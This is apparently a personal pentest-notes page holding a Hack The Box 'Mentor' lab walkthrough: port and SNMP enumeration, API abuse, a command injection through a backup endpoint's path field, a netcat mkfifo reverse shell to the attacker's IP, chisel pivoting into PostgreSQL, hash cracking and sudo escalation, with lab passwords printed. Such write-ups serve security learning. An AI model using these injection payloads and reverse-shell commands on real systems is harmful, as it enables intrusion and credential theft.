CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Nmap
  • UDP
  • SNMP
  • Enumeration
  • snmp-mibs-downloader
  • snmp-check
  • HTTP
  • API
  • Back to SNMP
  • Privilege Escalation
  • Postgresql
  • linepeas
  • SSH as james
  • James' sudo rights
  • Resources
  1. Writeups
  2. Hackthebox Writeups

Hackthebox - Mentor

PreviousHackthebox - LoveNextHackthebox - MetaTwo

Last updated 2 years ago

Nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.11.193                   
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 10:50 EST
Nmap scan report for 10.10.11.193
Host is up (0.028s latency).
Not shown: 65527 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c73bfc3cf9ceee8b4818d5d1af8ec2bb (ECDSA)
|_  256 4440084c0ecbd4f18e7eeda85c68a4f7 (ED25519)
80/tcp   open     http       Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://mentorquotes.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/25%OT=22%CT=1%CU=38011%PV=Y%DS=2%DC=I%G=Y%TM=63A874
OS:B2%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST
OS:11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 896.09 seconds
  • We need to change /etc/hosts file and add this 10.10.11.193 mentorquotes.htb

UDP

I was kinda stuck on emumeration (I had check port 80 but did not think of subdomain enum right away) at first so I did an udp port scan with nmap sudo nmap -T4 -sU 10.10.11.193 and got interesting results.

Note this taught me that it is always worth to do an udp scan as well.

  • Nmap result

┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sU 10.10.11.193               
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 15:18 EST
Nmap scan report for mentorquotes.htb (10.10.11.193)
Host is up (0.029s latency).
Not shown: 936 closed udp ports (port-unreach), 63 open|filtered udp ports (no-response)
PORT    STATE SERVICE
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 936.95 seconds

SNMP

Enumeration

┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -sU 10.10.11.193 -p 161 -sC
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 15:22 EST
Nmap scan report for mentorquotes.htb (10.10.11.193)
Host is up (0.030s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-sysdescr: Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
|_  System uptime: 4h32m34.56s (1635456 timeticks)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: a124f60a99b99c6200000000
|   snmpEngineBoots: 67
|_  snmpEngineTime: 4h32m35s

Nmap done: 1 IP address (1 host up) scanned in 14.65 seconds

============================================================================

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -p 161 --script=snmp-* 10.10.11.193
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 15:32 EST
Nmap scan report for mentorquotes.htb (10.10.11.193)
Host is up (0.028s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-sysdescr: Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
|_  System uptime: 4h42m31.26s (1695126 timeticks)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: a124f60a99b99c6200000000
|   snmpEngineBoots: 67
|_  snmpEngineTime: 4h42m30s
| snmp-brute: 
|_  public - Valid credentials

Nmap done: 1 IP address (1 host up) scanned in 16.53 seconds

============================================================================

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -p 161 -sV 10.10.11.193                                                                                                                                                                                              130 ⨯
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 16:23 EST
Nmap scan report for mentorquotes.htb (10.10.11.193)
Host is up (0.034s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: mentor

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds

snmp-mibs-downloader

  • sudo apt install snmp-mibs-downloader

  • sudo download-mibs

  • sudo vi /etc/snmp/snmp.conf we comment the line "mibs:"

┌──(kali㉿kali)-[~/Documents/hackthebox/Mentor]
└─$ snmpbulkwalk -c public -v2c 10.10.11.193 .
SNMPv2-MIB::sysDescr.0 = STRING: Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (1839922) 5:06:39.22
SNMPv2-MIB::sysContact.0 = STRING: Me <admin@mentorquotes.htb>
SNMPv2-MIB::sysName.0 = STRING: mentor
SNMPv2-MIB::sysLocation.0 = STRING: Sitting on the Dock of the Bay
SNMPv2-MIB::sysServices.0 = INTEGER: 72
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
SNMPv2-MIB::sysORUpTime.1 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.2 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.3 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.4 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.5 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.6 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.7 = Timeticks: (0) 0:00:00.00
SNMPv2-MIB::sysORUpTime.8 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.9 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.10 = Timeticks: (1) 0:00:00.01
HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (1841856) 5:06:58.56
HOST-RESOURCES-MIB::hrSystemDate.0 = STRING: 2022-12-25,20:56:45.0,+0:0
HOST-RESOURCES-MIB::hrSystemInitialLoadDevice.0 = INTEGER: 393216
HOST-RESOURCES-MIB::hrSystemInitialLoadParameters.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-56-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
HOST-RESOURCES-MIB::hrSystemNumUsers.0 = Gauge32: 0
HOST-RESOURCES-MIB::hrSystemProcesses.0 = Gauge32: 230
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = INTEGER: 0
HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

snmp-check

┌──(kali㉿kali)-[~]
└─$ snmp-check -v 2c 10.10.11.193                 
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.193:161 using SNMPv2c and community 'public'

[*] System information:

  Host IP address               : 10.10.11.193
  Hostname                      : mentor
  Description                   : Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
  Contact                       : Me <admin@mentorquotes.htb>
  Location                      : Sitting on the Dock of the Bay
  Uptime snmp                   : 05:54:18.44
  Uptime system                 : 05:53:59.18
  System date                   : 2022-12-25 21:44:05.0

[*] Network information:

  Default TTL                   : noSuchObject
  TCP segments received         : noSuchObject
  TCP segments sent             : noSuchObject
  TCP segments retrans          : noSuchObject
  Input datagrams               : noSuchObject
  Delivered datagrams           : noSuchObject
  Output datagrams              : noSuchObject

[*] File system information:

  Index                         : noSuchObject
  Mount point                   : noSuchObject
  Access                        : noSuchObject
  Bootable                      : noSuchObject

HTTP

  • We land on this page when visiting http://mentorquotes.htb/

  • Gobuster does not give anything interesting

  • Here is the http response header with some infos

HTTP/1.1 200 OK
Date: Sun, 25 Dec 2022 16:57:58 GMT
Server: Werkzeug/2.0.3 Python/3.6.9
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 5506
Connection: close

API

  • Let's try subdomain with wfuzz wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://mentorquotes.htb/' -H "HOST: FUZZ.mentorquotes.htb"

[STRIPPED]
000000051:   404        0 L      2 W        22 Ch       "api - api" 
[STRIPPED]
  • Here we get mainly 302 except for the api which gives us a 404. Let's add it in /etc/hosts file 10.10.11.193 mentorquotes.htb api.mentorquotes.htb

  • We can use gobuster again to find endpoints in this new subdomain. We get interesting results on our api

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://api.mentorquotes.htb/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://api.mentorquotes.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/25 17:01:26 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 307) [Size: 0] [--> http://api.mentorquotes.htb/admin/]
/docs                 (Status: 200) [Size: 969]
/quotes               (Status: 307) [Size: 0] [--> http://api.mentorquotes.htb/quotes/]
/server-status        (Status: 403) [Size: 285]
/users                (Status: 307) [Size: 0] [--> http://api.mentorquotes.htb/users/]
Progress: 20456 / 20476 (99.90%)===============================================================
2022/12/25 17:04:09 Finished
===============================================================
  • That's very cool we get the docs of the API http://api.mentorquotes.htb/docs.

  • We also have an admin endpoint that will be worth having a look at later

  • I created a user

POST /auth/signup HTTP/1.1
Host: api.mentorquotes.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://api.mentorquotes.htb/docs
Content-Type: application/json
Origin: http://api.mentorquotes.htb
Content-Length: 96
Connection: close

{
  "email": "cybherbag@mentorquotes.htb",
  "username": "cybherbag",
  "password": "cybherbagpass"
}
  • It seems like we might be able to enumerate users. Let's try this

  • We need to be an admin. Let's see what else we can do

  • I tried to bruteforce the token with hashcat but it did not go anywhere.

  • I tried to tamper with it on jwt.io. It was useful to see how it is made but we do not have the key.

  • Let's try to play with the signup and see if we could signup another james user. So if we try with username and email it does not work we get a message saying that the user exists already. Using this we can check if the admin user we found when enumerating smtp exists on the api. But it does not so let's keep trying to impersonate james.

  • I tried different things but nothing worked

Back to SNMP

  • Let's try to go further with SNMP, maybe we'll have more luck.

  • We did not try all the possible tools or wordlists.

┌──(kali㉿kali)-[~/Documents/hackthebox/Mentor]
└─$ onesixtyone -c wordlist-common-snmp-community-strings.txt 10.10.11.193 
Scanning 1 hosts, 122 communities
10.10.11.193 [public] Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
10.10.11.193 [public] Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
  • Nothing here.

  • Let's try it also with nmap sudo nmap -sU --script snmp-brute 10.10.11.193 --script-args snmp-brute.communitiesdb=wordlist-common-snmp-community-strings.txt

  • We do not get anything more than the public community.

    • sudo apt update we update our kali

    • sudo apt install python3-venv we instal venv

    • python3 -m venv snmpbrute we create a new venv

    • source snmpbrute/bin/activate we launch it

    • pip install scapy it requires scapy to work properly

    • python3 snmpbrute.py -t 10.10.11.193 -p 161

  • Once we are done with snmpbrute we can deactivate the env by typing deactivate

  • Let's run snmpwalk, we will have to put the output in a file, because it is huge snmpwalk -c internal 10.10.11.193 -v2c > internalenum

  • Let's see whats in the file and make a search on "STRING" it seems to output interesting infos

  • Apart from James we also have an svc account

  • When we try to access /admin/check it says it is not implemented yet

  • Let's try to see if it can execute commands. This is the value that we will put in path /etc/passwd;wget http://10.10.14.5/test

  • Alse before sending the request we need to launch our python http server, this way we will see if it actually checks the file. python3 -m http.server 80

  • So now we should try to get a shell. Let's set up a listener rlwrap nc -lvp 4444

  • The only one that worked is this one (do not forget the semi colon in the end and put sh and not bash because bash will fail) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f;

  • We can grab the user flag from /home/svc/user.txt

Privilege Escalation

  • Looking around we find different interesting files.

  • The /app/app/db.py shows the database url os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")

Note that here we get connection string to the db. The username and pass are postgres:postgres

Postgresql

  • With a quick search we can find that default postreSQL port is 5432.

  • We could try our luck there.

  • To install chisel on your kali curl https://i.jpillora.com/chisel! | bash

  • Then you will need to put a chisel binary in your target

  • wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz get it in your kali

  • gzip -d chisel_1.7.7_linux_amd64.gz extract it

  • python3 -m http.server 80 start your python serv

  • wget http://10.10.14.5/chisel_1.7.7_linux_amd64 get it from the target

  • chmod +x chisel_1.7.7_linux_amd64 make it executable

  • \c mentorquotes_db we connect to the db we want

  • Let's crack svc password in hashcat hashcat -m 0 hash /usr/share/wordlists/rockyou.txt

  • We get this password 53f22d0dfa10dce7e29cd31f4f953fd8:123meunomeeivani

  • We can now connect in ssh as svc ssh svc@10.10.11.193 which is a more convenient shell.

linepeas

  • Let's upload linepeas in our target to enumerate wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

  • python3 -m http.server 80

  • And in our target wget http://10.10.14.5/linpeas_linux_amd64

  • chmod +x linpeas_linux_amd64

  • ./linpeas_linux_amd64

SSH as james

  • Let's try to use it for james ssh james@10.10.11.193

  • It works!

James' sudo rights

  • Let's first try sudo -l and if it does not work let's run linepeas again

  • We get something really interesting! James has sudo rights on /bin/sh

  • Let's try sudo /bin/sh

  • We can grab the flag

Resources

hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt mentorquotes.htb snmp

We find a username james and their email james@mentorquotes.htb

Turns out it has a signup endpoint

First we need to login to get and authorization token

Now let's try to see info of user 1

Also the did not work.

Let's use onesixtyone with onesixtyone -c wordlist-common-snmp-community-strings.txt 10.10.11.193

We can use also . I really recommend using a pipenv to install it

It found another community internal

We find a string that looks like a password kj23sadkj123as0-d213! Let's try it in our API to see if we get james this way. If it does not work on the API we will try it on ssh.

It works, we get a token!

Let's try our juicy endpoints. It seems to work, we can list the users

Another interesting endpoint to check is the one that is not in the docs but that gobuster found for us /admin/.

When we try to access /admin/backup it does not accept the GET method. Let's try with a post.

It needs a body and we should also change the content type header to application/json. So our request in burp repeater looks like this

We have another info when we get the response. It also need a path.

As it wants a path let's ask it for /etc/passwd. It seems to work but does not output the file

Here is our request

It does get the file!

So I tried multiple payload from my pentips, and

So we get a shell. It's root, but last time I saw this it was because I ended up in a docker container.

And an ls proves that we indeed are in a docker again

We will need . This tool is my favorite for when I need to tunnel or pivot. It really helped me a lot when I was working on Dante prolab. If you do not like this one there are other alternatives out there like or .

Now we need to launch a chisel server in our kali sudo chisel server --port 5555 --reverse

./chisel_1.7.7_linux_amd64 client -v 10.10.14.5:5555 R:5432:172.22.0.1:5432 we forward the postgresql port to be able to access it in our kali

psql -h 10.10.14.5 -U "postgres" -p 5432 let's try to connect to the database. If you need a refresh on postgresql is a nice article

\l list the database

select * from "users";

Linepeas finds the snmpd conf file. Let's have a look

It contains a password! SuperSecurePassword123__

It works we have a root shell

common attacks on jwt
this wordlist
this tool
pentestmonkey
payloadallthethings
chisel
sshuttle
socat
here
SNMP Lab Setup and Penetration Testing - Hacking Articles
Pentesting SNMP on Hacktricks
Enumerating SNMP Servers with nmap - minimalist Ascent
SNMP pentesting on infosec resources
Hacktebox mentor
landing
hydra
user
Signup
login
access denied
communities
password
james login
users
admin
backup
request
response
works
request
python server
shell
docker
chisel server
chisel client
list db
table users
snmp
conf file
root